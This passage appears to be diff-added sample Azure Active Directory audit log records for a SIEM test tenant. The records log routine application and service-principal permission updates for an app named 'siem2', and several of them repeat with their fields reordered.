"actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2045249Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620418"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d23b201c-5436-4ecc-a789-18d3f00ea76c"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:37", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "811fd012-35a6-4a0c-abce-79fb08b9ab6c"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:37.2595378Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34620448"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "99a3d3e3-e4f6-4de7-96e0-6333564e1b25"}
